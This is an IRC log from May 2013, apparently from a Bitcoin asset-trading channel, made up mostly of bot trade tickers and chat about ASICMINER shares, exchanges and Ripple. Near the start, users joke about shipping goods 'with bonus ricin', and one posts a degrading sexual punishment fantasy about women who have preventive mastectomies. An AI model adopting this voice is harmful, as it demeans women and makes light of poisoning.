14 07:49:17 he codes malboge compilers in js May 14 07:49:17 >programming May 14 07:49:18 wat May 14 07:49:57 [BTCTC] [ASICMINER-PT] 17 @ 1.69 = 28.73 BTC [+] May 14 07:50:56 [BTCTC] [TAT.ASICMINER] 224 @ 0.0162 = 3.6288 BTC [+] May 14 07:51:01 [BTCTC] [TAT.ASICMINER] 250 @ 0.0163 = 4.075 BTC [+] May 14 07:51:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.0165 = 0.33 BTC [+] May 14 07:51:43 the problem with selling the bfl order May 14 07:51:47 is forum May 14 07:52:18 [BTCTC] [ASICMINER-PT] 4 @ 1.69 = 6.76 BTC [+] May 14 07:52:20 suppose I could pay someone to proxy May 14 07:52:39 i recomend usagi. May 14 07:52:46 sounds legit May 14 07:52:50 lol usagi May 14 07:52:53 whatever happened to him May 14 07:52:56 is he in jail yet May 14 07:53:06 hopefully mnw buys it May 14 07:53:18 so then dub will have sold his putative inaba product to mnw via usagi May 14 07:53:27 btc is going through 200 per with this design May 14 07:53:57 [BTCTC] [ASICMINER-PT] 5 @ 1.69 = 8.45 BTC [+] May 14 07:55:50 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [+] May 14 07:55:55 [HAVELOCK] [HIM] 1 @ 2.1 BTC [-] May 14 07:57:54 [HAVELOCK] [ASICM] 1 @ 0.01559999 BTC [+] May 14 07:58:09 so May 14 07:58:18 I wonder if the btcmc stock DMC owns will ever be worth something May 14 07:58:50 dub: it seems the better hype to reward factor is on ebay May 14 08:00:19 i mean 1700 order fpga trade in asic 65 gh/s has a lot of buzz words in it May 14 08:01:05 [BTCTC] [TAT.ASICMINER] 33 @ 0.017 = 0.561 BTC [+] May 14 08:02:20 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [+] May 14 08:05:54 [HAVELOCK] [ASICM] 265 @ 0.015 = 3.975 BTC [-] May 14 08:07:25 http://www.nytimes.com/2013/05/14/opinion/my-medical-choice.html?_r=3& May 14 08:07:30 odd asicminer on btct.co is 1.7 May 14 08:07:30 if MNW buys it I'm shipping with bonus ricin May 14 08:07:50 dub, ill help! May 14 08:08:19 I don't hink they make ricin from rice May 14 08:08:31 we ahve beans here too May 14 08:08:56 something like ebola would be more fun May 14 08:09:08 none of that here, but i agree May 14 08:11:39 [BTCTC] [ASICMINER-PT] 1 @ 1.699999 BTC [-] May 14 08:11:57 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [+] May 14 08:12:08 woooo 1.7 May 14 08:12:11 what a beast May 14 08:12:14 lol i was trying to get infront of them orders May 14 08:12:25 I made a decision to have a preventive double mastectomy. May 14 08:12:27 fuck btct.co is slow May 14 08:12:28 this is perverse May 14 08:12:59 [BTCTC] [ASICMINER-PT] 10 @ 1.69999 = 16.9999 BTC [-] May 14 08:13:27 [BTCTC] [ASICMINER-PT] 5 @ 1.7 = 8.5 BTC [+] May 14 08:14:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.01644 = 0.0493 BTC [-] May 14 08:14:39 man, it should be illegal to have a preventative mastectomy May 14 08:14:52 [BTCTC] [S.DICE-PT] 20 @ 0.003155 = 0.0631 BTC [+] May 14 08:15:03 punishment, you shall be permanently mounted on a framework where people will fuck you all day long May 14 08:15:18 since they cant play with your tits, your ass and cunt will be good enough May 14 08:15:22 doesnt sound like such punishment May 14 08:15:23 mah god May 14 08:15:23 May 14 08:15:31 this beast is going to get to 2btc a share before next div May 14 08:15:32 besides, she's got some baloons installed May 14 08:15:43 mircea_popescu: its just not the same thing, really May 14 08:15:50 she claims it is. May 14 08:15:51 ever feel up a chick with fake tits? May 14 08:15:58 sounded more like a weirdo ad than anything, but anyway. May 14 08:15:59 yes. May 14 08:16:04 you can TELL its not the real thing May 14 08:16:34 depends May 14 08:17:19 I have never felt a set of fake tits that felt real May 14 08:17:31 they dont feel real, they dont look real May 14 08:17:46 in general the cheaper/older jobs are suckier May 14 08:17:52 Diablo-D3 wants tits to authenticate with gribble first May 14 08:17:53 but the better/newer stuff is passible May 14 08:18:07 mircea_popescu: well, the real problem is May 14 08:18:12 some chick gets a set of Ds, right? May 14 08:18:14 NO SAG May 14 08:18:18 well no d's May 14 08:18:25 very large jobs are of course evident May 14 08:18:27 anything bigger than an A needs sag May 14 08:20:12 "In neighboring Venezuela, where implants are so popular they are sometimes even given to girls by their parents as a 15th birthday gift or as prizes in fund-raising raffles, there were frissons of anxiety among the many thousands of surgically enhanced women." May 14 08:21:38 anyway, off for today. take it ezzy all May 14 08:22:14 night **** BEGIN LOGGING AT Tue May 14 15:29:50 2013 May 14 15:31:50 [BTCTC] [TAT.ASICMINER] 393 @ 0.016305 = 6.4079 BTC [+] May 14 15:31:55 [BTCTC] [TAT.ASICMINER] 100 @ 0.01637 = 1.637 BTC [+] May 14 15:32:03 [BTCTC] [TAT.ASICMINER] 100 @ 0.01644 = 1.644 BTC [+] May 14 15:32:25 [BTCTC] [TAT.ASICMINER] 100 @ 0.01655 = 1.655 BTC [+] May 14 15:32:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.01664 = 0.832 BTC [+] May 14 15:35:54 ;;ticker May 14 15:35:55 BTCUSD ticker | Best bid: 118.82003, Best ask: 118.89000, Bid-ask spread: 0.06997, Last trade: 118.89000, 24 hour volume: 24707.07845915, 24 hour low: 116.02500, 24 hour high: 119.54900, 24 hour vwap: 117.87356 May 14 15:36:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.01639 = 0.8195 BTC [-] May 14 15:36:45 [BTCTC] [TAT.ASICMINER] 75 @ 0.01644 = 1.233 BTC [+] May 14 15:37:07 [BTCTC] [TAT.ASICMINER] 100 @ 0.01655 = 1.655 BTC [+] May 14 15:37:40 [BTCTC] [TAT.ASICMINER] 100 @ 0.01659 = 1.659 BTC [+] May 14 15:38:08 [BTCTC] [TAT.ASICMINER] 125 @ 0.01664 = 2.08 BTC [+] May 14 15:38:11 wtf is diz nuts https://bitcointalk.org/index.php?topic=180717.0 May 14 15:39:38 [BTCTC] [ASICMINER-PT] 4 @ 1.7499 = 6.9996 BTC [+] May 14 15:40:10 [BTCTC] [TAT.ASICMINER] 100 @ 0.01669 = 1.669 BTC [+] May 14 15:40:22 [BTCTC] [ASICMINER-PT] 4 @ 1.75 = 7 BTC [+] May 14 15:40:39 [BTCTC] [ASICMINER-PT] 4 @ 1.75 = 7 BTC [+] May 14 15:40:58 What's wrong with that? May 14 15:41:02 [BTCTC] [TAT.ASICMINER] 100 @ 0.01669 = 1.669 BTC [+] May 14 15:41:04 [BTCTC] [ASICMINER-PT] 2 @ 1.7589 = 3.5178 BTC [+] May 14 15:41:36 all stocks are dead buy asic miner? May 14 15:41:41 but* May 14 15:41:55 [BTCTC] [TAT.ASICMINER] 50 @ 0.01662 = 0.831 BTC [-] May 14 15:42:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.01669 = 0.8345 BTC [+] May 14 15:42:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.01657 = 0.8285 BTC [-] May 14 15:42:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.01669 = 0.8345 BTC [+] May 14 15:43:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.01669 = 0.8345 BTC [+] May 14 15:44:04 kakobrekla more of the same ripple stuff neh ? May 14 15:44:06 it's how it works. May 14 15:44:28 "Security: May 14 15:44:28 • Without giving details, we have created a redundant system. The web front end is separated from the server." May 14 15:44:30 dunno i just skimmed through it and looks wtf. May 14 15:44:47 "we won't mention where we got this from, god forbid we actually get some market goodwill" May 14 15:44:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.01667 BTC [-] May 14 15:45:03 well most ripple looks wtf, at least to my untrained eye./ May 14 15:45:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.01667 = 0.2 BTC [-] May 14 15:45:53 ripple does not seem like it will ever work May 14 15:46:17 maybe i guess if enough people but money and time into it, but they will have to all trust each other, seems risky May 14 15:46:27 esp when we ahve btc, ripple seems like a step backwards to me. May 14 15:46:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.01662 = 0.0831 BTC [-] May 14 15:46:53 mp, you heard about the newest reptilia lulz? May 14 15:46:58 i must have missed it May 14 15:47:02 CNN needs time to buy some bitcoin May 14 15:47:05 ;;title http://money.cnn.com/2013/05/14/investing/bremmer-bitcoin/index.html?hpt=hp_t3 May 14 15:47:05 Error: This url is not on the whitelist. May 14 15:47:15 lol whoa May 14 15:47:15 seems he was robbede and the hotel overcharged him May 14 15:47:23 Chaang-Noi o that. heh. May 14 15:47:36 as in the hotel charged him for the damage to the room May 14 15:47:41 and the hookers expected to be paid ? May 14 15:47:54 i kinda doubt either happened May 14 15:48:06 convenient this article promotes Amazon and AMEX coins May 14 15:48:14 i think he just booked shit for 20 people and no one showed up, and then btc went down when he thought it would be 1000 May 14 15:48:17 news or advertising, you be the judge... May 14 15:48:30 Chaang-Noi that too. May 14 15:48:47 just my guess, i did not fully check out everything May 14 15:49:29 he lol, he seems like a nutter, i dont think he will ever get his supernode network set up if he acts like this May 14 15:49:48 can i buy a supernode with XRP? May 14 15:49:56 im not sure May 14 15:49:59 hehe May 14 15:50:11 from his chart it would seems so, as long as you convert it to btc May 14 15:50:12 [BTCTC] [ASICMINER-PT] 2 @ 1.7589 = 3.5178 BTC [+] May 14 15:50:17 if so, I'll hop on my unicorn and make delivery May 14 15:50:19 but you are ging to need about all the rippels evar May 14 15:51:42 [BTCTC] [ASICMINER-PT] 3 @ 1.7589 = 5.2767 BTC [+] May 14 15:52:05 [BTCTC] [TAT.ASICMINER] 25 @ 0.01659 = 0.4148 BTC [-] May 14 15:53:13 [BTCTC] [PAJKA.BOND] 1 @ 0.1059 BTC [-] May 14 15:54:00 [BTCTC] [ASICMINER-PT] 3 @ 1.778 = 5.334 BTC [+] May 14 15:54:47 lol ltc be free fallin May 14 15:55:06 [BTCTC] [PAJKA.BOND] 2 @ 0.1059 = 0.2118 BTC [-] May 14 15:56:32 http://trilema.com/2013/the-poster-child-for-github-retardation/ May 14 15:56:45 github has jumped the shark. May 14 15:57:58 jumped a shark eh? May 14 15:58:19 i almost ran into a croc 2 days ago on the fucking highway May 14 15:58:47 Chaang-Noi its an idiomatic. May 14 15:59:00 yeah i assumed cuz of context May 14 15:59:22 but it made me think of that croc on the highway May 14 15:59:25 it's when a show goes rto shit May 14 15:59:31 especially a long running thing like a serial May 14 15:59:36 never seen that shit before May 14 16:00:37 man its only 8 pm and im tired as fuck May 14 16:00:44 http://tvtropes.org/pmwiki/pmwiki.php/Main/JumpingTheShark May 14 16:01:15 ahh cuz the fin, interesting May 14 16:02:10 [BTCTC] [ASICMINER-PT] 9 @ 1.77 = 15.93 BTC [-] May 14 16:02:18 1.77 insane May 14 16:02:53 I shouldn't have sold at .41 I guess... May 14 16:02:59 :) May 14 16:03:05 i sold some at .4 May 14 16:03:41 insane May 14 16:04:10 ThickAsThieves i like how your recent asset is somehow dominating the older oens May 14 16:04:16 am i missing something here ?! May 14 16:04:37 well, market is telling me I need to sell 5% below May 14 16:04:43 due to me keeping 5% of divs May 14 16:04:54 which shows you market's bad math May 14 16:05:02 but oh well May 14 16:05:48 hey, more power to you. May 14 16:07:21 [BTCTC] [S.DICE-PT] 18 @ 0.00358 = 0.0644 BTC [-] May 14 16:07:45 [BTCTC] [ASICMINER-PT] 1 @ 1.77 BTC [-] May 14 16:10:10 [BTCTC] [ASICMINER-PT] 1 @ 1.779 BTC [+] May 14 16:10:45 [BTCTC] [ASICMINER-PT] 4 @ 1.7795 = 7.118 BTC [+] May 14 16:10:49 [BTCTC] [S.DICE-PT] 167 @ 0.00358 = 0.5979 BTC [-] May 14 16:10:54 [BTCTC] [ASICMINER-PT] 1 @ 1.779999 BTC [+] May 14 16:11:13 [BTCTC] [ASICMINER-PT] 3 @ 1.779999 = 5.34 BTC [+] May 14 16:11:26 [BTCTC] [ASICMINER-PT] 3 @ 1.78 = 5.34 BTC [+] May 14 16:17:36 "The question in any gold rush is who will do better: the people mining, or the people selling the shovels? ASICMiner decided they can do both." ---> this May 14 16:17:48 :) May 14 16:18:17 they are going to do what ever is more profitable May 14 16:19:16 Uglux https://bitcointalk.org/index.php?topic=201268.msg2141827#msg2141827 that. May 14 16:23:18 "who will be spending 2 BTC on gear that will never in its useful lifetime mine 2 BTC." I wil solo mine with 4 sticks and a rpi for the lulz :) May 14 16:23:37 div paid it already :P May 14 16:23:42 right May 14 16:23:46 but this isn't economical thinking. May 14 16:23:51 this is just hobbist having fun. May 14 16:23:57 not a basis for discussing finance. May 14 16:25:37 Which means if mining ever becomes very unprofitable, ASICMINER can just keep selling at a profit to hobbyists... May 14 16:26:00 Unless someone really beat them hard time on cost performance May 14 16:27:41 Namworld http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ for instance. May 14 16:30:02 [BTCTC] [ASICMINER-PT] 1 @ 1.77 BTC [-] May 14 16:31:04 [BTCTC] [ASICMINER-PT] 1 @ 1.77 BTC [-] May 14 16:33:03 [HAVELOCK] [ASICM] 7 @ 0.01608999 = 0.1126 BTC [+] May 14 16:34:03 [HAVELOCK] [ASICM] 18 @ 0.01608999 = 0.2896 BTC [+] May 14 16:36:43 [BTCTC] [COGNITIVE] 1 @ 0.223315 BTC [+] May 14 16:37:55 [BTCTC] [S.DICE-PT] 240 @ 0.00358 = 0.8592 BTC [-] May 14 16:39:22 [BTCTC] [S.MPOE-PT] 8 @ 0.000666 = 0.0053 BTC [-] May 14 16:39:39 lol May 14 16:39:59 i wonder how long that lasts. May 14 16:46:07 [BTCTC] [TAT.ASICMINER] 100 @ 0.01628 = 1.628 BTC [-] May 14 16:46:11 [BTCTC] [TAT.ASICMINER] 100 @ 0.01627 = 1.627 BTC [-] May 14 16:46:22 [BTCTC] [TAT.ASICMINER] 100 @ 0.01626 = 1.626 BTC [-] May 14 16:46:26 [BTCTC] [TAT.ASICMINER] 200 @ 0.01625 = 3.25 BTC [-] May 14 16:50:17 [BTCTC] [TAT.ASICMINER] 100 @ 0.01649 = 1.649 BTC [+] May 14 16:51:04 [BTCTC] [TAT.ASICMINER] 100 @ 0.01655 = 1.655 BTC [+] May 14 16:53:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.01659 = 0.4148 BTC [+] May 14 16:53:22 [BTCTC] [TAT.ASICMINER] 75 @ 0.01659 = 1.2443 BTC [+] May 14 16:53:53 [BTCTC] [TAT.ASICMINER] 75 @ 0.01659 = 1.2443 BTC [+] May 14 16:54:33 [BTCTC] [TAT.ASICMINER] 100 @ 0.01659 = 1.659 BTC [+] May 14 16:54:38 [BTCTC] [TAT.ASICMINER] 100 @ 0.016201 = 1.6201 BTC [-] May 14 16:54:45 [BTCTC] [TAT.ASICMINER] 45 @ 0.01662 = 0.7479 BTC [+] May 14 16:55:22 [BTCTC] [TAT.ASICMINER] 105 @ 0.01662 = 1.7451 BTC [+] May 14 16:55:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.01662 = 0.831 BTC [+] May 14 16:56:02 [HAVELOCK] [ASICM] 4 @ 0.01608999 = 0.0644 BTC [+] May 14 16:57:03 [HAVELOCK] [HIM] 1 @ 2.1001 BTC [-] May 14 16:57:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.01665 = 0.1166 BTC [+] May 14 16:57:31 [BTCTC] [TAT.ASICMINER] 30 @ 0.01665 = 0.4995 BTC [+] May 14 16:58:02 [HAVELOCK] [ASICM] 28 @ 0.01608999 = 0.4505 BTC [+] May 14 16:59:03 [HAVELOCK] [VTX] 14 @ 0.4646 = 6.5044 BTC [+] May 14 16:59:04 [HAVELOCK] [VTX] 2 @ 0.46474008 = 0.9295 BTC [+] May 14 16:59:05 [HAVELOCK] [VTX] 24 @ 0.46475 = 11.154 BTC [+] May 14 17:00:02 [HAVELOCK] [VTX] 3 @ 0.4646 = 1.3938 BTC [-] May 14 17:00:03 [HAVELOCK] [VTX] 2 @ 0.4646 = 0.9292 BTC [-] May 14 17:02:02 [HAVELOCK] [ASICM] 72 @ 0.01629 = 1.1729 BTC [+] May 14 17:10:45 assbot should come in #bitcoin-anal May 14 17:10:49 x) May 14 17:12:24 lol May 14 17:12:47 [MPEX] [S.MPOE] 4850 @ 0.00067909 = 3.2936 BTC [-] May 14 17:12:49 [MPEX] [S.MPOE] 579 @ 0.00068011 = 0.3938 BTC [+] May 14 17:12:54 [MPEX] [S.MPOE] 5071 @ 0.00068146 = 3.4557 BTC [+] May 14 17:14:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.01639 = 0.8195 BTC [-] May 14 17:15:15 [BTCTC] [S.BBET-PT] 2 @ 0.00206 = 0.0041 BTC [-] May 14 17:17:35 [BTCTC] [TAT.ASICMINER] 50 @ 0.01643 = 0.8215 BTC [+] May 14 17:18:03 [HAVELOCK] [HIM] 2 @ 2.15 = 4.3 BTC [+] May 14 17:18:29 [BTCTC] [ASICMINER-PT] 1 @ 1.764895 BTC [-] May 14 17:21:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.01646 = 0.823 BTC [+] May 14 17:22:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.01646 = 0.823 BTC [+] May 14 17:23:35 BTCTC totally stalls every time someone makes an order May 14 17:23:56 [BTCTC] [ASICMINER-PT] 1 @ 1.76648 BTC [+] May 14 17:24:17 could i crash the prices if i put in a bunch of Qty 1 orders? ;) May 14 17:24:54 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] May 14 17:26:30 lol getting goxed May 14 17:26:32 [BTCTC] [ASICMINER-PT] 1 @ 1.766945 BTC [+] May 14 17:27:38 [BTCTC] [TAT.ASICMINER] 50 @ 0.01649 = 0.8245 BTC [+] May 14 17:28:09 [BTCTC] [ASICMINER-PT] 1 @ 1.76798 BTC [+] May 14 17:28:16 it's very interesting to see the volume difference across these 3 exchanges May 14 17:28:24 BTCT is killing it May 14 17:28:32 the Havelock had a great first few days May 14 17:28:38 and sold the most overall May 14 17:28:40 but has stalled May 14 17:28:52 and Bitfunder is like waaaay behind May 14 17:29:25 [BTCTC] [ASICMINER-PT] 1 @ 1.767489 BTC [-] May 14 17:29:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.01649 = 0.8245 BTC [+] May 14 17:29:36 also intersting that people are leaving cheaper shares in Butfunder alone May 14 17:29:40 it seems ukto's decision to split off didn't work out for him then, i recall it was about at parity with btctc May 14 17:29:50 split off? May 14 17:29:52 six months or so ago May 14 17:29:59 they were a team? May 14 17:30:06 well didn't he make his own chan and everything rather than pipe into assbot ? May 14 17:30:18 i'm not quite sure his reasoning there May 14 17:30:27 he tells me it's that web socket is just better May 14 17:30:34 but his bot does die often May 14 17:30:46 he has live orderbooks May 14 17:30:48 so that helps May 14 17:30:52 but i do prefer asbot May 14 17:30:54 assbot* May 14 17:31:01 all things in one place May 14 17:31:06 you mean like $depth ? May 14 17:31:22 like if you have an asset page up May 14 17:31:29 he has AJAX or sumth May 14 17:31:30 o it ajaxes ? May 14 17:31:31 yeah May 14 17:31:42 its pretty neat May 14 17:31:43 but May 14 17:31:55 i still want tickers in channel May 14 17:31:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.0165 = 0.825 BTC [+] May 14 17:32:38 i'm trying to sort out why BF is not popular May 14 17:32:38 yea May 14 17:32:44 i think that's why. May 14 17:32:57 so the assbot acts as free aadvertising May 14 17:33:12 i also think that you need two accounts to use BF hurts it May 14 17:33:25 Weex / BF May 14 17:33:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.01652 = 0.826 BTC [+] May 14 17:35:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.0165 = 0.825 BTC [-] May 14 17:35:43 i dont use it for that reason May 14 17:36:41 once you have it set up its not a big deal May 14 17:36:42 but i can see how it acts as initial barrier May 14 17:37:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.01652 = 0.826 BTC [+] May 14 17:39:56 [BTCTC] [ASICMINER-PT] 1 @ 1.76878 BTC [+] May 14 17:40:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:41:01 Anyone know anything about CAvirtex? Like whether anyone has gotten any withdrawals from them lately at all? May 14 17:41:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:41:57 afaik some people have been waitingfor some time. May 14 17:42:17 interesting May 14 17:42:34 maybe Canada wants to close them too May 14 17:42:35 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 14 17:43:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:43:58 [BTCTC] [ASICMINER-PT] 1 @ 1.76888 BTC [+] May 14 17:44:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:46:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:47:25 [BTCTC] [ASICMINER-PT] 2 @ 1.769 = 3.538 BTC [+] May 14 17:49:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.01655 = 0.8275 BTC [+] May 14 17:49:25 My bank xfer is within its days (from friday) but "same day" payza transfers from sat and sun are not at payza yet May 14 17:49:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.01658 = 0.829 BTC [+] May 14 17:50:17 so basically, not one publically traded bitcoin exchange has worked out yet May 14 17:50:49 [BTCTC] [ASICMINER-PT] 1 @ 1.769 BTC [+] May 14 17:50:55 yeah. May 14 17:53:02 [HAVELOCK] [ASICM] 15 @ 0.01629 = 0.2444 BTC [+] May 14 17:53:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.01658 = 0.829 BTC [+] May 14 17:54:32 i was dreaming that yest. May 14 17:54:37 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] May 14 17:54:40 srs May 14 17:54:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.01655 BTC [-] May 14 17:54:57 dreaming about virtex? May 14 17:55:46 geez, BTCTC is hanging for like minutes for each order... May 14 17:55:54 goxed indeed May 14 17:55:57 about ipo of some clearing house in panama or some shit May 14 17:56:43 panamirtex May 14 17:56:49 panex May 14 17:56:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.01661 = 0.8305 BTC [+] May 14 17:57:13 gox isnt going anywhere any time soon May 14 17:57:17 [BTCTC] [TAT.ASICMINER] 49 @ 0.01655 = 0.811 BTC [-] May 14 17:58:33 cuz every reason really, other than not being exemplary May 14 17:58:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.01661 = 0.8305 BTC [+] May 14 17:59:05 [BTCTC] [TAT.ASICMINER] 50 @ 0.01661 = 0.8305 BTC [+] May 14 17:59:17 i guess you could say they are institutionalized at this point May 14 18:00:39 [BTCTC] [TAT.ASICMINER] 13 @ 0.01665 = 0.2165 BTC [+] May 14 18:00:40 surely, but comes with much stress May 14 18:00:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.01665 = 0.4163 BTC [+] May 14 18:00:58 if they can keep their heads they can continue to make bank May 14 18:01:00 for years May 14 18:01:16 derp May 14 18:01:23 maybe even be the bank May 14 18:01:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.01665 = 0.4163 BTC [+] May 14 18:02:02 [BTCTC] [TAT.ASICMINER] 25 @ 0.01665 = 0.4163 BTC [+] May 14 18:02:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.01659 = 1.659 BTC [-] May 14 18:02:45 [BTCTC] [TAT.ASICMINER] 18 @ 0.01659 = 0.2986 BTC [-] May 14 18:03:02 [HAVELOCK] [ASICM] 163 @ 0.01629 = 2.6553 BTC [+] May 14 18:04:02 [HAVELOCK] [ASICM] 75 @ 0.01633 = 1.2248 BTC [+] May 14 18:04:03 [HAVELOCK] [ASICM] 425 @ 0.01638 = 6.9615 BTC [+] May 14 18:06:43 [BTCTC] [TAT.ASICMINER] 82 @ 0.01659 = 1.3604 BTC [-] May 14 18:11:02 [HAVELOCK] [ASICM] 167 @ 0.01649 = 2.7538 BTC [+] May 14 18:15:14 [MPEX] [S.DICE] 1000 @ 0.00329987 = 3.2999 BTC [+] May 14 18:15:16 [MPEX] [S.DICE] 515 @ 0.00329988 = 1.6994 BTC [+] May 14 18:15:41 230+84+15+2 May 14 18:15:45 [BTCTC] [B.YABMC] 80 @ 0.01842 = 1.4736 BTC [+] May 14 18:15:49 oops May 14 18:15:53 ignore May 14 18:16:05 this is obv not a calc May 14 18:17:01 its a password! May 14 18:17:15 oh noes! May 14 18:17:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.01659 = 0.083 BTC [-] May 14 18:19:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.01659 = 0.0664 BTC [-] May 14 18:21:22 [BTCTC] [PAJKA.BOND] 1 @ 0.1031 BTC [-] May 14 18:22:06 [BTCTC] [BITVPS] 10 @ 0.000721 = 0.0072 BTC [-] May 14 18:22:08 [BTCTC] [TAT.ASICMINER] 66 @ 0.01659 = 1.0949 BTC [-] May 14 18:22:57 [BTCTC] [BITVPS] 8 @ 0.00072 = 0.0058 BTC [-] May 14 18:23:17 [MPEX] [S.DICE] 8050 @ 0.00307188 = 24.7286 BTC [-] May 14 18:24:15 [BTCTC] [BITVPS] 1 @ 0.00072 BTC [-] May 14 18:24:15 [HAVELOCK] [SDICE] 1 @ 0.2849 BTC [+] May 14 18:24:15 [HAVELOCK] [SDICE] 3 @ 0.2849 = 0.8547 BTC [+] May 14 18:24:36 [BTCTC] [ASICMINER-PT] 1 @ 1.764498 BTC [-] May 14 18:25:10 [BTCTC] [BITVPS] 20 @ 0.0007 = 0.014 BTC [-] May 14 18:26:30 [BTCTC] [BITVPS] 10 @ 0.0007 = 0.007 BTC [-] May 14 18:26:33 [BTCTC] [ASICMINER-PT] 1 @ 1.764878 BTC [+] May 14 18:27:02 [HAVELOCK] [KCIM] 1 @ 1.465 BTC [-] May 14 18:27:42 [BTCTC] [BITVPS] 30 @ 0.0007 = 0.021 BTC [-] May 14 18:27:59 [BTCTC] [ASICMINER-PT] 1 @ 1.765 BTC [+] May 14 18:29:40 [BTCTC] [ASICMINER-PT] 1 @ 1.767488 BTC [+] May 14 18:30:55 [BTCTC] [TAT.ASICMINER] 200 @ 0.01659 = 3.318 BTC [-] May 14 18:30:59 [BTCTC] [BITVPS] 20 @ 0.00066 = 0.0132 BTC [-] May 14 18:32:08 [BTCTC] [BITVPS] 20 @ 0.00064 = 0.0128 BTC [-] May 14 18:32:49 [BTCTC] [TAT.ASICMINER] 100 @ 0.01662 = 1.662 BTC [+] May 14 18:34:07 [BTCTC] [TAT.ASICMINER] 25 @ 0.01662 = 0.4155 BTC [+] May 14 18:35:16 [BTCTC] [TAT.ASICMINER] 41 @ 0.01662 = 0.6814 BTC [+] May 14 18:35:40 ;;calc 140/118 May 14 18:35:40 1.18644067797 May 14 18:35:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.01662 BTC [+] May 14 18:36:16 ;;calc 118/140 May 14 18:36:17 0.842857142857 May 14 18:38:59 [BTCTC] [ASICMINER-PT] 1 @ 1.74 BTC [-] May 14 18:42:11 [BTCTC] [BITVPS] 6 @ 0.00062 = 0.0037 BTC [-] May 14 18:44:05 [BTCTC] [BITVPS] 30 @ 0.0007 = 0.021 BTC [+] May 14 18:46:35 4 May 14 18:46:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.01659 = 0.3318 BTC [-] May 14 18:47:02 [HAVELOCK] [SDICE] 4 @ 0.2849 = 1.1396 BTC [+] May 14 18:54:27 [BTCTC] [TAT.ASICMINER] 12 @ 0.01659 = 0.1991 BTC [-] May 14 18:54:51 [BTCTC] [ASICMINER-PT] 1 @ 1.764897 BTC [+] May 14 18:55:17 [BTCTC] [TAT.ASICMINER] 100 @ 0.01654 = 1.654 BTC [-] May 14 18:59:30 1.7 wtf with you ppl May 14 19:00:03 [HAVELOCK] [ASICM] 30 @ 0.01649 = 0.4947 BTC [+] May 14 19:00:08 why no 1 tell me that when its was 0.2btc/30$ May 14 19:00:40 [BTCTC] [ASICMINER-PT] 1 @ 1.730011 BTC [-] May 14 19:02:03 [HAVELOCK] [ASICM] 3 @ 0.01649 = 0.0495 BTC [+] May 14 19:04:02 [HAVELOCK] [ASICM] 4 @ 0.01649 = 0.066 BTC [+] May 14 19:06:18 I bought some at 0.10 May 14 19:06:23 I sold at 0.41... May 14 19:06:26 I regret May 14 19:07:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.01659 = 0.0995 BTC [+] May 14 19:07:56 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [-] May 14 19:08:00 miss the perfect trade, sold SD @0.07 and bought AM @0. May 14 19:08:09 0.1 May 14 19:08:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.01659 BTC [+] May 14 19:08:44 [BTCTC] [TAT.ASICMINER] 61 @ 0.01659 = 1.012 BTC [+] May 14 19:08:55 @Namworld: sorry for your lost !! why did you sold btw ? May 14 19:10:16 [BTCTC] [TAT.ASICMINER] 83 @ 0.01662 = 1.3795 BTC [+] May 14 19:12:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.01665 = 0.4163 BTC [+] May 14 19:13:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.01665 = 0.4163 BTC [+] May 14 19:13:06 [BTCTC] [TAT.ASICMINER] 9 @ 0.01665 = 0.1499 BTC [+] May 14 19:14:23 [BTCTC] [RSM] 2 @ 0.0075 = 0.015 BTC [-] May 14 19:14:50 [BTCTC] [ASICMINER-PT] 5 @ 1.75 = 8.75 BTC [+] May 14 19:15:36 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 14 19:15:53 [BTCTC] [RSM] 15 @ 0.01 = 0.15 BTC [+] May 14 19:16:02 